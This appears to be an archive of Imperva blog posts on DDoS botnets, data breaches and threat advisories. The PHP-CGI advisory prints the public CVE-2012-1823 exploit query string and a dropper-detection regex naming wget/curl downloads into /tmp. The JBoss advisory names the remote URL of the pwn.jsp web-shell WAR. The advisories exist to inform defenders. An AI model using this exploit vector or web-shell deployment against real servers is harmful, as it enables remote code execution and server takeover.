46 posts categorized "Barry Shteiman"
April 02, 2014
 The rise of DDoS Botnets

Last week, Incapsula released a report analyzing the latest trends on the DDoS front. The report exposes advancements in both network and application layers.

While the Incapsula report analyzes in detail the different trends and types of DDoS attacks and their volumes, I would like to look into one of the most interesting aspects of its findings – the application DDoS attacks that originate from botnets.

Last year we wrote extensively about the trend of CMS hacking for industrialized cybercrime, where attackers compromise machines, onboard them into botnets, and then use those botnets as platforms for network and application attacks. For DDoS attacks, this just makes sense: when a hacker has the power of masses behind a large botnet, there are great opportunities to disrupt service. And when servers are infected rather than users’ computers, it is even worse, simply because of the bandwidth and computing power that becomes available to the hacker.

Incapsula’s research corroborates our findings from last year, with a large portion of the attacks coming from botnets. During 2013, Incapsula witnessed a 240% increase in attack volume, and it is important to mention that many of the attacks used the WordPress CMS platform as the bot attack platform.

 

Figure: DDoS botnets geographic distribution

 

DDoS bots become more complex

A few months ago, in a Threat Advisory on a JBoss vulnerability, we demonstrated how easy it is to hijack a server for malicious intent; the hacker code involved, however, was always quite simple in terms of its abilities.

Incapsula, using its unique bot analysis mechanism, was able to isolate an interesting trend. The bots, while still mostly primitive, are evolving. More and more bots have advanced to the point where they can interact with the application itself, mimicking a real user.

 

Figure: DDoS botnets geographic distribution

 

At the very least, this shows the direction that industrialized hackers are taking. Realizing the potential in bots, hackers are moving to develop more advanced bots that can bypass classic solutions by incorporating the ability to disguise themselves as a user or a browser.

Here are some of Incapsula’s bot-related findings:

  • More than 25% of all botnets are located in India, China and Iran
  • 29% of botnets attack more than 50 targets a month
  • 29.9% of DDoS bots can hold cookies
  • 46% of all spoofed user-agents are fake Baidu Bots (while 11.7% are fake Googlebots)
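Incidentally, distinguishing a real Googlebot or Baidu spider from a spoofed one is usually done with a reverse-then-forward DNS check. Here is a minimal Python sketch of that standard technique; the function name and the injectable resolver parameters are ours, purely for illustration:

```python
import socket

def is_genuine_crawler(ip, claimed_ua, reverse_dns=None, forward_dns=None):
    """Return True if a client claiming to be Googlebot or Baiduspider
    resolves (reverse, then forward) to the crawler's real domain."""
    # Default resolvers use the stdlib; tests can inject fakes.
    reverse_dns = reverse_dns or (lambda addr: socket.gethostbyaddr(addr)[0])
    forward_dns = forward_dns or (lambda host: socket.gethostbyname(host))
    ua = claimed_ua.lower()
    if "googlebot" in ua:
        valid_suffixes = (".googlebot.com", ".google.com")
    elif "baiduspider" in ua:
        valid_suffixes = (".baidu.com", ".baidu.jp")
    else:
        return False  # not a crawler UA we verify in this sketch
    try:
        host = reverse_dns(ip)
        if not host.endswith(valid_suffixes):
            return False  # PTR record points outside the crawler's domain
        # Forward-confirm: a spoofed PTR won't resolve back to the same IP.
        return forward_dns(host) == ip
    except OSError:
        return False
```

A bot that merely copies the Baidu or Google user-agent string fails this check, which is one way the spoofed-crawler percentages above can be measured.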

Where can I learn more?

  1. The Incapsula DDoS report, here
  2. Incapsula’s infographic, here

 

 

 

March 18, 2014
 Threat Advisory: PHP-CGI At Your Command

For a long time, PHP has been the dominant server-side framework for companies writing their web applications. In fact, roughly 82% of all websites today are written in PHP. And while PHP’s power in numbers creates an appetite among security researchers to look for flaws – leading to maturity, documentation, and security best practices – the same numbers drive hackers to focus on it as well.


In October 2013, a public exploit for PHP was disclosed. The exploit uses a vulnerability found in May 2012 and categorized as CVE-2012-1823. The exploit shows that PHP, in conjunction with Apache, suffers from a command injection vulnerability.

Soon after the exploit was released, Imperva honeypots detected web servers being attacked with this exploit in different flavors. In the first three weeks following the publication we recorded as many as 30,000 attack campaigns using the exploit. As this was an interesting surge in attack activity, we decided to look deeper into the attack.

Later on, we picked up intelligence showing that different botnets have adopted the vulnerability for its effectiveness, and we have also captured samples of bot clients with this exploit embedded in them.

One of the interesting points is that despite the fact that this vulnerability is somewhat dated, cybercriminals are still using it, understanding that a major part of the install base of PHP does not update on a regular basis – thus creating the window of opportunity.

In this threat advisory, we will cover the following:

  • The technical background and analysis of the vulnerability and exploitation techniques
  • Samples of the attack vectors captured in the wild
  • Industrialized cybercrime aspects of this vulnerability
  • Mitigation techniques

 

A first look into the vulnerability

The vulnerability first appeared in the various vulnerability databases on October 29, 2013, and was identified as CVE-2012-1823. Exploitation code was soon available on different exploit websites.


The vulnerability enables a remote attacker to execute arbitrary commands on a web server running PHP 5.3.x before 5.3.12 or 5.4.x before 5.4.2. These versions account for 16% of all public websites on the Internet.
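As a rough illustration, the affected ranges can be expressed as a simple version check. The helper below is ours, not part of PHP, and it only models the 5.3.x and 5.4.x branches named in the advisory:

```python
def is_vulnerable(version):
    """CVE-2012-1823 affects PHP 5.3.x before 5.3.12 and 5.4.x before 5.4.2.
    Older, unsupported PHP branches are not modeled in this sketch."""
    major, minor, patch = (int(part) for part in version.split("."))
    if (major, minor) == (5, 3):
        return patch < 12
    if (major, minor) == (5, 4):
        return patch < 2
    return False
```

A check like this (against the output of `php -v`) is a quick first pass when auditing a fleet of servers for exposure.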


 

The honeypot trail…

After analyzing the attacks recorded by our honeypot, we learned a few interesting facts:

  • The overall count of attackers (distinct source IPs) was 324, while the overall count of targeted web servers was 272. Most of the attacks originated from the US (35%), France (21%) and Germany (15%).


  • The most common URL used in the attacks was by far //cgi-bin/php (chart 1). Later on we will explain why the attack requires the exact location of the PHP CGI executable in order to succeed.


  • The biggest attacks in terms of volume were carried out within a period of half a day to a full day.


  • The vast majority of the attackers (86 distinct attacker IPs) executed their attack within half a day to a full day, attacking a single target. As the attack period and the number of targets grew, the number of attackers dropped significantly.


Technical Background and Analysis         

The vulnerability’s official (and somewhat confusing) description reads:

“sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string.”

The simple, straightforward explanation is that an external attacker can set command line options for the PHP execution engine. Such command line options eventually allow the attacker to execute arbitrary PHP code on the server.

You might scratch your head and ask – haven’t we seen this before? The answer is YES! This vulnerability is not new, and public exploits for it have been published before.


In previous cases, the attack relied on the server configuration redirecting all PHP files to PHP CGI, making it vulnerable to code leakage, code execution and more. The new attack, however, tries to access the PHP CGI directly and hence must use the exact location of the PHP CGI executable.

Before we move on, it is essential to understand what PHP CGI is and how it works. Common Gateway Interface (CGI) is a standard method used to generate dynamic content on web pages and web applications. PHP CGI means using the PHP interpreter through CGI mode. The web server will pass the data from the request to PHP (an external program); its input is a PHP file (usually on the server) and its output is HTML code (usually rendered in the client’s browser). PHP CGI configuration is set via PHP INI directives files.

The vulnerability allows remote attackers to place PHP command line options in the query string, including the “-d” option. This option defines a PHP INI directive before running the PHP interpreter. In this attack, the “-d” option is used to manipulate PHP security settings in order to bypass security checks and allow remote code execution.

Looking at the sapi/cgi/cgi_main.c file from the vulnerable PHP code tree, we can see which directives are used for the security checks. The code points to two PHP CGI settings: cgi.force_redirect and cgi.redirect_status_env.

The PHP configuration directive cgi.force_redirect prevents anyone from calling PHP directly with a URL. Since PHP turns this directive on by default, direct access to PHP via http://example.com/cgi-bin/php will produce an HTTP error code and the following error message:

The PHP CGI cannot be accessed directly. This PHP CGI binary was compiled with force-cgi-redirect enabled.  This means that a page will only be served up if the REDIRECT_STATUS CGI variable is set, e.g. via an Apache Action directive.

Controlling the cgi.force_redirect and cgi.redirect_status_env values enables the attacker to bypass the PHP CGI security check.

Another crucial directive that is set using the “-d” option in the attack is auto_prepend_file. This directive specifies the name of a file that is automatically parsed before the main file; php://input is a read-only stream which, in our case, is the raw data from the request body.

By setting auto_prepend_file to php://input the payload of the attack (arbitrary PHP code) is introduced in the request body.
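Putting the pieces together, the widely published exploit vector encodes exactly these directives in the query string. The sketch below decodes that well-known public vector (reproduced from the public exploit, not from one of our captured samples):

```python
from urllib.parse import unquote_plus

# Representative query string from the widely published CVE-2012-1823 exploit.
# Note that the '=' signs are encoded as %3d: the raw query string must contain
# no literal '=' for the web server to pass it to php-cgi as command line args.
raw_query = (
    "-d+allow_url_include%3don"
    "+-d+auto_prepend_file%3dphp://input"
    "+-d+cgi.force_redirect%3d0"
    "+-d+cgi.redirect_status_env%3d0"
    "+-n"
)

# Each decoded "-d directive=value" pair overrides a php.ini setting before
# the interpreter runs; "-n" skips loading the real php.ini entirely.
decoded = unquote_plus(raw_query)
```

After decoding, the query string becomes a list of interpreter options that disable the cgi.force_redirect check and prepend the request body (php://input) as PHP code.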

Attack vectors captured in the wild

Let’s take a look at an example attack vector that was captured in the wild. URL-decoded, the query string sets exactly the directives described above. Not surprisingly, the HTTP request body of this vector contained PHP code that downloaded and installed a botnet malware client.

Payloads analysis

We have managed to identify 43 different types of payload data in the attacks registered by our honeypot. The payloads appear to be botnet malware clients constructed along a common pattern: the PHP payload downloads a malware executable from a remote server into an inconspicuous directory (/tmp, /dev/shm, /var/lock, /var/tmp), runs it, and then hides that it ever existed by removing it from the file system. The servers that host these files are usually legitimate, but compromised, servers, and the file names are disguised as image files or text files.
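As a toy illustration of that pattern, a monitoring script might flag shell command strings that combine the download, execute, and delete stages. Everything below (the directory list, the regexes, the two-stage threshold) is an illustrative sketch, not production detection logic:

```python
import re

# Heuristics for the download / execute / delete sequence described above.
STAGING_DIRS = r"(?:/tmp|/dev/shm|/var/lock|/var/tmp)"
PATTERNS = [
    re.compile(r"\b(?:wget|curl|fetch)\b.*" + STAGING_DIRS),  # download to a staging dir
    re.compile(STAGING_DIRS + r"/\S+\s*(?:;|&&)"),            # execute the dropped file
    re.compile(r"\brm\s+(?:-f\s+)?" + STAGING_DIRS),          # remove the evidence
]

def looks_like_dropper(command):
    """Flag a shell command string that matches at least two stages of the
    download-run-hide pattern."""
    return sum(bool(p.search(command)) for p in PATTERNS) >= 2
```

A command like `wget http://203.0.113.9/a.jpg -O /tmp/.x; /tmp/.x; rm -f /tmp/.x` trips all three stages, while ordinary shell activity trips none.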

The malware files are usually written in PHP, Python or C and vary from simple reverse shell backdoors to IRC clients that connect to C&C servers. We also noticed that some of the malware behaves differently according to the kernel version and processor architecture of the infected server.


Our experience shows that this level of sophistication is linked with industrialized crime, also known as bot herding. The attackers in this case, scan for servers that are exposed to the vulnerability (using PHP CGI from vulnerable versions) to infect them with their bot clients, thus transforming them into zombies which receive commands from a C&C server under their control. These botnets are then sold or rented to the highest bidder.

A surprising fact is that even today this vulnerability can be used successfully, as companies don’t take the appropriate measures to secure their servers. Evidence of this can be found in drop sites that are still actively hosting the botnet clients.

 

Some of the botnets that we have been looking into are still active; some are relatively new, and activity can be witnessed in the form of commands being sent to the zombie servers operating under their control.

 

It is an intriguing point: cybercriminals understand the serious gap between the time a vulnerability is found in the wild and the time it gets reported and patched (especially when third-party software or a framework, such as PHP, is in the loop). On top of that, there is a further lag until a company becomes aware of both the issue and the fix, and implements it. This creates a window of opportunity for hackers to act on, as they know the window will stay open for a long time.


 

PHP Patch

PHP offers a patch (here) to mitigate the vulnerability: a verification was added to ensure that the query string does not include command line options.
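The idea behind the fix can be mirrored in a few lines. This is a paraphrase in Python of the check's intent, not the actual PHP patch code:

```python
def query_string_is_suspicious(raw_query):
    """Paraphrase of the idea behind the PHP fix (not the real patch):
    a query string with no '=' sign that begins with '-' looks like an
    attempt to smuggle command line options into php-cgi."""
    return "=" not in raw_query and raw_query.lstrip().startswith("-")
```

A normal query string such as `page=1` contains an `=` and passes; the exploit vector, which must avoid literal `=` characters, starts with `-d` and is rejected.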

 

Mitigation Recommendations

  • Verify your PHP version is not vulnerable (i.e., PHP 5.3.12 and up, PHP 5.4.2 and up); if you still use a vulnerable PHP version, make sure it is patched
  • If it is possible, do not use PHP in CGI mode
  • Place your web application behind a web application security solution (such as a WAF) to protect it from web attacks such as this one

 

January 31, 2014
 Yahoo’s email breach, another 3rd party incident.

Early last year, Imperva published a report analyzing a breach that Yahoo had suffered via a vulnerability on their astrology site. As a reminder, back then Yahoo’s astrology site was operating with data coming from a platform provided by a third party company. When that third party server was breached, Yahoo got the bad headlines.

Today, Yahoo disclosed a breach that affected their own mail system and apparently resulted from a third party hack. And while Yahoo definitely responded very fast to the incident, it raises questions for any company out there.

Companies should ask themselves:

  • How are we securing our users’ information and ourselves when we use third party services (which could be hosting, SaaS, call centers, authentication providers, website plugins and more)?
  • How much do we know about the security measures implemented by the third party companies we obtain services from?
  • If we provide a service to others, how secure is it?

Often, companies seem to put their trust in code and services that are not homegrown without knowing if they have the ability to monitor and secure said services.

What is the industry doing about it?

PCI v3.0 is a very good example of one regulation that addresses this issue, as it just added a mandate for service providers to secure their client information, making them accountable for the security of that data.

Where can I learn more?

  • Background information on last year’s Yahoo breach can be found in this HII report
  • Our webinar covering the most recent PCI v3.0 changes
  • Our CMS Hacking research, covering the implications of third-party vulnerable applications

 

January 21, 2014
 The Impact of Insider Threats – The South Korea Episode.

You can’t escape the data breach news that has piled up over the last few months. The recent high-profile hacks have raised market awareness.

Today, both CNN and Bloomberg covered the South Korean data breach that apparently hit ~40% of the South Korean population, about 20 million people.

In Layman’s Terms, What Happened?

At the center of the story is an employee who was working as a software engineer for three credit card companies. Over the course of a year and a half, this employee copied data from corporate servers to his personal drive. What makes this story particularly interesting is that the software engineer was writing anti-fraud software for the firms that he worked for during the same time that he was stealing data.

Business Impact? You Bet!

According to Bloomberg, 27 executives resigned following this incident, including bank CEOs and other senior management. Over half a million credit card users have already asked for new credit cards with many more to come. Perhaps the most significant impact is on the brand of the affected companies. Some companies never recover from the brand damage caused by such a massive security breach.

Key Takeaway

There are opportunities to prevent these sorts of breaches. Auditing and a properly deployed behavior alerting system could and should have flagged abnormal behavior from a user with privileged access. In this case, a software engineer who needed access to perform his job was copying massive amounts of data over time. From a security standpoint, a simple “rule” that alerts IT when a user accesses massive amounts of sensitive data over time would have stopped him in his tracks.
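Such a rule can be sketched in a few lines. The class below is a toy sliding-window counter; the class name, thresholds, and window size are entirely illustrative placeholders, not recommended values:

```python
import time
from collections import defaultdict, deque

class ExfiltrationMonitor:
    """Toy sliding-window rule: alert when one user reads more than a
    threshold of sensitive records within a time window."""
    def __init__(self, max_records=10_000, window_seconds=86_400):
        self.max_records = max_records
        self.window = window_seconds
        self.events = defaultdict(deque)  # user -> deque of (timestamp, count)

    def record_access(self, user, count, now=None):
        """Log one access of `count` records; return True if an alert fires."""
        now = time.time() if now is None else now
        q = self.events[user]
        q.append((now, count))
        # Drop events that have fallen out of the window.
        while q and q[0][0] <= now - self.window:
            q.popleft()
        total = sum(c for _, c in q)
        return total > self.max_records
```

The point is not the code's sophistication but its simplicity: a per-user running total over a window is enough to catch a year and a half of steady bulk copying.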

 

December 18, 2013
 Website Traffic is Tipping in Favor of Automated Clients

Incapsula, Imperva’s subsidiary focused on cloud-based application security, just released its annual Bot Traffic Report for 2013, which analyzed 1.45 billion visits over a 90-day period and concluded that automated web traffic is on the rise. Traffic from these bots now makes up as much as 61.5% of all website traffic, an increase of 21% over last year’s report. This automated traffic includes good bots, such as search engines, as well as malicious traffic like site scrapers, hacking tools, comment spammers and other homegrown bots.

One potential contributing factor is the continued proliferation of web services. New online services are being created at a record pace, bringing with them new bots scouring the internet for information. As these bots crawl the internet, they bring with them bandwidth consumption and service degradation.

 

Another possible explanation is that botnet creators are developing new tools and infecting machines with increasingly ingenious social engineering tactics. Brian Krebs of Krebs on Security released a blog post this morning dissecting a new malicious Firefox plugin that infects PCs, automatically probes any websites visited with the infected browser for SQL injection vulnerabilities, and then reports the results back to the botnet’s control center. As of the time of writing, this botnet had already infected more than 12,500 systems, illustrating how easy it is for today’s botnet farmers to assemble powerful networks of infected computers.

With web services being increasingly weaved into the fabric of our online lives, and botnets growing in size and sophistication, it is likely that this trend of automated web traffic will show no signs of abatement in the near future.

 

December 11, 2013
 HII: Assessing the threat landscape of DBaaS

Over the past few years we’ve seen an ever-growing tide of data breaches, with reports of new breaches coming out almost every day. Having said that, there are still very few published details on how actual data exfiltration happens. This is mainly due to the fact that organizations that have been breached are hesitant to share information other than what they are obligated to share by law.

As a result, while there is quite a lot of information on how endpoints become infected as well as on what the Command and Control (C&C) communication looks like (IP reputation, etc.), there is almost none on what the threat looks like from enterprise data center point of view. There are lots of discussions about the need to share information, and for a good reason. Unfortunately, these discussions have not necessarily translated into actual sharing.

This lack of insight greatly hampers the ability to develop effective security measures. Statistics are always open to interpretation, and because the security industry is left to rely on statistical analysis, security strategies are often left with a gaping hole.

To fill that void, we constantly conduct research to understand the properties of potential threats to data centers. Our latest Hacker Intelligence Initiative report, “Assessing the Threat Landscape of DBaaS” is the latest result of this research initiative.

What does DBaaS have to do with it?

Data centers are no longer confined to the enterprise perimeter. More and more enterprises take their data to the cloud, but forget to adjust their risk management practices when doing so. The recent MongoHQ breach is just one example of this type of oversight.

While we didn’t find malware that directly attacked a database, our research did find and analyze malware with a module able to connect to Microsoft MSSQL. Moreover, the research found that this malware was used to automatically connect to MSSQL cloud service for both C&C and data exfiltration purposes.

As an interesting side note, we also stumbled upon a cool sample after the writing of this report: malware that brought its own MySQL dll library to the infected machine. This fact correlates with our assessments of growing trends in data center security threats.

What’s in the Report?

The report shows how attackers took advantage of hosted database services in order to set up their own C&C and drop servers. The servers led us to some interesting insights about the advantages of using “malicious” hosted data-stores, and the risks they present to legitimate users. For example, enterprises need to re-assess the severity of database vulnerabilities in a hosted environment.

Analyzing the attackers’ data-store also revealed interesting points, such as the targeting of business platforms. In conclusion, we predicted what we believe are growing trends in the data-store threat landscape.

Where can I learn more?

  1. Our Hacker Intelligence Initiative (HII) report can be found here
  2. The Blog on the MongoHQ breach, here
  3. A Forbes article, looking into the DBaaS trend, here
  4. An Oracle user group research, covering what users are really doing with audit and security problems, here 

 

November 27, 2013
 1.2M Loyaltybuild Customers' Data Breached - Why?

Last week, Ireland’s Office of the Data Protection Commissioner (ODPC) reported that the loyalty marketing company Loyaltybuild had been hit with a major data breach. The breach, affecting at least 1.2 million customers, resulted in the loss of customer names, addresses, phone numbers and email addresses, in addition to 376,000 credit card numbers (CCNs).

In a statement on their website, Loyaltybuild wrote:

           "We have ceased taking bookings on our website and over the phone" 

According to their website, Loyaltybuild was established in 1999 and is “backed by sophisticated web, booking engine and database technologies, designed for large-scale campaigns in one or more languages.” 

Unfortunately, Loyaltybuild was also storing unencrypted sensitive information, and too much of it at that. As if the CCN data were not enough, CVV numbers (whose storage PCI-DSS prohibits) were also compromised. There is very little reason for Loyaltybuild to hold CCN information (especially unencrypted) and no reason at all to store CVV numbers.

Let’s talk about the numbers: hundreds of thousands of credit card records and more than a million records of additional information (emails, addresses, etc.) is a lot to exfiltrate. Data monitoring should have alerted on such a large number of records being read or moved – especially when the data was moved outside of the organization.

According to reports, some of the data was historical (from 2011 - 2012). Historical records - that are less frequently accessed - should have raised an even bigger flag.

As ‘sophisticated’ as this breach might prove to be, simple monitoring of data records could have alerted security personnel and might have prevented this breach. Most would agree that copying a million records is worth opening a ticket with the IT security team.

Another recent security event, the MongoHQ breach, revealed the dangers of attacks on service providers: ‘hack one hack them all.’ The service provider is not the only one on the receiving end of these attacks - their customers are as well. 

After the MongoHQ breach we advised that customers take responsibility for their sensitive data and know how their business partners are securing it. In the Loyaltybuild case, customers agreed to share too much, in plaintext, with no guarantees. When using third party services businesses should share the bare minimum of information with their partners. This is particularly true of sensitive information.

In both cases, simple encryption of the sensitive data might have minimized the fallout. Moreover, in both cases customers were way too trusting of their service provider. Whether the provider is a cloud-based startup or an established business like Loyaltybuild, customers need to protect themselves and not assume their service providers will do the job for them.

Security is based on trust; however, given these recent breaches, trust is increasingly difficult to come by.

 

November 18, 2013
 Threat Advisory: A JBoss AS Exploit, Web Shell code Injection.

JBoss Application Server (or JBoss AS) is an open-source Java EE-based application server. JBoss AS was developed by JBoss, now a division of Red Hat. In late 2012, JBoss AS was renamed WildFly.

Recently, Imperva’s ADC detected a surge in the exploitation of web servers powered by JBoss AS, probably as a result of the public disclosure of exploit code that abuses this vulnerability.

The vulnerability allows an attacker to abuse the management interface of the JBoss AS in order to deploy additional functionality into the web server. Once the attackers deploy that additional functionality, they gain full control over the exploited JBoss infrastructure, and therefore the site powered by that Application Server.

While the vulnerability itself is not new and has been known for at least two years, it is amazing to realize that during these years the attack surface has not decayed but has in fact grown, in terms of the number of vulnerable web applications.

The Incident Timeline

In 2011, a JBoss AS vulnerability was presented at security conferences. Researchers showed that JBoss AS is vulnerable to remote command execution via the ‘HTTP Invoker’ service that provides Remote Method Invocation (RMI)/HTTP access to Enterprise Java Beans (EJB).

In September 2013, NIST assigned a Common Vulnerabilities and Exposures identifier (CVE-2013-4810) to a code execution vulnerability in certain HP products that utilize JBoss AS.

On October 4, 2013, a security researcher made the exploit publicly available. Immediately thereafter, we witnessed a surge in JBoss AS hacking, which manifested in malicious traffic originating from infected servers, observed in Imperva’s honeypot array.

The Exploit’s Technical Analysis

JBoss AS is vulnerable to remote command execution via the ‘HTTP Invoker’ service that provides Remote Method Invocation (RMI)/HTTP access to Enterprise Java Beans (EJB).

Java Beans are reusable software components for Java, represented as serializable Java objects. An MBean (Managed Bean) is a type of Java Bean, and javax.management.ObjectName represents the object name of an MBean. MBeans are usually used in Java Management Extensions (JMX), a Java technology that supplies tools for managing and monitoring applications, system objects, devices and service-oriented networks. Those resources are represented by MBeans.

JMX uses a 3-level architecture:

  1. The Probe level contains MBeans
  2. The Agent level, or MBeanServer, is the core of JMX. It acts as an intermediary between the MBean and the applications.
  3. The Remote Management level enables remote applications to access the MBeanServer through connectors and adaptors. A connector provides full remote access to the MBeanServer API while an adaptor translates requests between a given protocol (e.g. HTTP, RMI) and a specific JMX functionality. The Invoker invokes the proper MBean service based on the actual JMX request.

Figure 1: JMX architecture

The detached Invoker allows MBean services to expose functional interfaces via arbitrary protocols for remote access by clients. The HTTP Invoker service, including EJBInvoker and JMXInvoker, includes a servlet that processes posts of marshaled (serialized) org.jboss.invocation.Invocation objects that represent invocations that should be dispatched onto the MBeanServer. Effectively this allows access to MBeans that support the detached invoker operation via HTTP POST requests.

The vulnerability consists of public HTTP access to the EJBInvokerServlet or JMXInvokerServlet servlets, exposed at the URLs /invoker/EJBInvokerServlet and /invoker/JMXInvokerServlet respectively, combined with invocation of the MainDeployer MBean. The MainDeployer MBean is responsible for deploying a WAR from a remote location.
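Assuming only what the advisory states about these paths, a defender can check whether a server of their own exposes the invoker servlets. The function below is an illustrative sketch (the two paths come from the advisory; the function name and injectable `opener` are ours), and should only be run against servers you are authorized to assess:

```python
from urllib.request import Request, urlopen
from urllib.error import HTTPError, URLError

INVOKER_PATHS = ["/invoker/EJBInvokerServlet", "/invoker/JMXInvokerServlet"]

def exposed_invokers(base_url, opener=urlopen):
    """Return the invoker servlet paths that answer without authentication.
    `opener` is injectable for testing; it defaults to urllib's urlopen."""
    exposed = []
    for path in INVOKER_PATHS:
        try:
            resp = opener(Request(base_url + path, method="HEAD"), timeout=5)
            status = resp.status
        except HTTPError as err:
            status = err.code        # server answered with an error status
        except (URLError, OSError):
            continue                 # unreachable: treat as not exposed
        if status == 200:
            exposed.append(path)
    return exposed
```

A hardened server should return 401/403 (or nothing at all) for both paths; a 200 response means the management interface is open to the world.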

The recently published exploit abuses /invoker/EJBInvokerServlet to deploy web shell code that enables the hacker to execute arbitrary operating system commands on the victim server’s system.

Figure 2: Exploit code

The exploit is a two-step process:

In the first step, the exploit abuses the EJBInvokerServlet to deploy a malicious Web application ARchive (WAR) from the remote URL http://retrogod.altervista.org/a.war, which includes the “a/pwn.jsp” shell code.

Figure 3: A network capture of the malicious web shell injection, as reproduced in Imperva’s lab

In the second step, the exploit sends an operating system command to the injected web shell.

Figure 4: A network capture of the commands sent to the injected web shell, as reproduced in Imperva’s lab

In-the-Wild Exploitation

Although this specific JBoss AS security issue has been known to the security community for a few years, it is amazing to realize that during these years the attack surface has not decayed but has in fact grown, in terms of the number of vulnerable web applications.

The number of servers exposing their JBoss management interfaces has more than tripled (from 7,000 to 23,000) since the vulnerability was presented in 2011.

Figure 5: Exposed JBoss management interfaces, October 2013 (Google dork here)

Figure 6: Exposed JBoss management interfaces, 2011

The list of exposed sites contains some governmental and educational sites. We identified some of them as actually infected with web shell code.

Many of the deployed web shells utilize the original pwn.jsp shell code that was presented with the original exploit, as can be seen in a blog entry posted by one of the attack’s victims.

Figure 7: Blog entry on a server infected with pwn.jsp

In other cases a more powerful web shell was deployed. Here the attackers used the JspSpy web shell, which includes a richer user interface, enabling them to easily browse the infected server’s files and databases, connect to a remote command and control server, and use other modern malware capabilities.

Figure 8: JspSpy user interface

Recommendations and Mitigation

  • JBoss users should harden their web applications according to the JBoss manual
  • Imperva’s customers have been updated with a signature to prevent unwanted access to the vulnerable JBoss AS servlet via our regular content updates.


 

November 14, 2013
 A Look Into The MongoHQ Breach – Protect Your (Big) Data

A recent security breach at MongoHQ (a MongoDB cloud services provider) left the company working hard to patch up security holes. As is unfortunately common, the breach was only detected when one of MongoHQ’s customers (Buffer) realized it had been hacked.

Following the attack, MongoHQ did the right thing: they apologized to their customers, detailed their security flaws (some quite staggering) and laid out what actions they are taking to improve security.

Although the actions that MongoHQ took do improve security, data service providers and customers should ask themselves if their data is ever secure enough.

Once the data provider is breached, its customers are the first to suffer. And when discussing service providers, “small” hacks have a potentially exponential effect. Once a single server has been breached, all of the databases and the customers that own them are breached.

You’re the weakest link!

If you’re a data service provider with hundreds or even thousands of customers, getting hacked is only a matter of when – and of when it will happen again.

Targeted attacks look for the weakest link in terms of security. When the weakest link is the data service provider and not the customer, the attackers might get greedy and not settle for just one target. A quote from MongoHQ:

“Currently, it appears that the unauthorized user was scanning for social media authentication information for spamming purposes, and probing for financial information in customer database”

Here are some of the issues that made the MongoHQ hack possible:

  • A support application was accessible through the web and not behind a VPN
  • Customer data was visible to users of this support application (what if the compromise was of an employee?)
  • Two factor authentication was not implemented
  • There was no User Rights Management
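The last two bullets have direct counterparts in MongoDB itself. As a minimal sketch (the settings below are illustrative and assume a current MongoDB release, not MongoHQ’s actual deployment), enabling role-based access control in mongod.conf forces every client, including an internal support tool, to authenticate as a user holding only the roles it needs:

```yaml
# mongod.conf – require authentication and role-based authorization,
# so that no client gets implicit full access to every database
security:
  authorization: enabled
```

With authorization enabled, a support application would connect as a dedicated user created with db.createUser() and granted a narrowly scoped role (for example, read-only access to a single database), rather than sharing an all-powerful account.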

Securing data requires, well, some data security

Even though many factors contributed to this breach (such as “Excessive and Unused Privileges”, “Privilege Abuse” and “Unmanaged Sensitive Data”), the MongoHQ breach’s root cause is an example of one of the Top Ten Database Threats: “Limited Security Expertise and Education”:

“Internal security controls are not keeping pace with data growth and many organizations are ill-equipped to deal with a security breach. Often this is due to the lack of expertise required to implement security controls, policies, and training.”

This means that organizations should rely on the security expertise of third-party businesses instead of reinventing the wheel or simply closing their eyes. Data security is a business of its own; data service providers shouldn’t be surprised when breaches occur to non-secured data, and the security learning curve, both theirs and that of the customers they have left, can be quite long and painful.

Since the breach, MongoHQ has taken very significant security measures; most notably, they brought in third-party validation of their security.

With Big Data Comes Big Responsibility

Limited security expertise and education is not only the service provider’s problem, it is also a real concern for its consumers. Were MongoHQ customers aware that their sensitive data was visible to the MongoHQ support application? Do you know who can access your data? How is it stored? Can it be copied?

These are all questions that are all too often forgotten, especially for young startup companies eager to build applications and avoid dealing with security and management costs.

Customers need to know what their service providers are doing to protect their data. This has recently become a new mandate with the rise of PCI-DSS v3.0, where service providers are now accountable for protecting the data of their customers. Data center security needs to be out in the open, especially “up in the cloud”.

While making your data somebody else’s problem is a nice fantasy, you are still accountable when it’s stolen or corrupted. You can’t guarantee your data availability when using a data service provider, but you can at least improve its integrity and confidentiality.

Joel Gascoigne from Buffer also realized this when he wrote on Hacker News:

“I want to be clear that this is still our fault. If access tokens were encrypted (which they are now) then this would have been avoided”.
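Gascoigne’s point generalizes: secrets stored in a third-party database should be encrypted at the application layer, with the key kept outside that database. A deliberately minimal Python sketch of the pattern (a one-time-pad XOR used purely for illustration; real code should use a vetted library such as Fernet from the cryptography package):

```python
import secrets

def encrypt_token(token: bytes, key: bytes) -> bytes:
    """XOR one-time pad: sound only if the key is random, secret, and
    never reused. This illustrates the pattern, not production crypto."""
    assert len(key) == len(token)
    return bytes(t ^ k for t, k in zip(token, key))

decrypt_token = encrypt_token  # XOR is its own inverse

# The key stays with the application; only ciphertext goes to the provider.
key = secrets.token_bytes(16)
ciphertext = encrypt_token(b"oauth-access-tok", key)
```

Had the stolen database rows held only ciphertext, the attacker would also have needed the application-side key before the access tokens were of any use.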

You as a customer would be smart to take responsibility for your own data. Recognize where your sensitive data is and prepare for the inevitable day when it is compromised. Additionally, we as customers need to hold our service providers accountable for security instead of just “taking their word.”

 

November 07, 2013
 Incapsula Pen-Test – Part Deux!

In 2013, we have been fortunate enough to receive a lot of positive attention for the Incapsula product line. In addition to the major news coverage garnered by stopping one of the internet’s largest unamplified DDoS attacks, and being ranked by TopTenReviews as the #1 DDoS mitigation service in a head-to-head bake-off against nine of our competitors, Incapsula has recently passed a third-party pen test with flying colors.

Last week, a new and comprehensive WAF pen test was published comparing Incapsula’s WAF to CloudFlare’s new rule-based WAF; the analysis can be downloaded here.

The test was conducted by Zero Science Lab, which also ran the previous penetration-test comparison back in February of this year. Zero Science Lab decided to run a “Round 2” after CloudFlare announced the launch of its new rule-based WAF in August.

Excerpts from Zero Science Lab’s Conclusion:

“From the results tables, we can see that Incapsula's WAF continues to have an advantage over CloudFlare's WAF. We should also mention that only Incapsula's WAF is PCI-Certified, which is an advantage for certain types of online businesses.

While CloudFlare's new WAF solution showed substantial improvement since the first penetration test, it still does not provide the comprehensive level of security against certain types of web application attacks (e.g., SQL injection, Remote File Inclusion) that many online businesses today require.

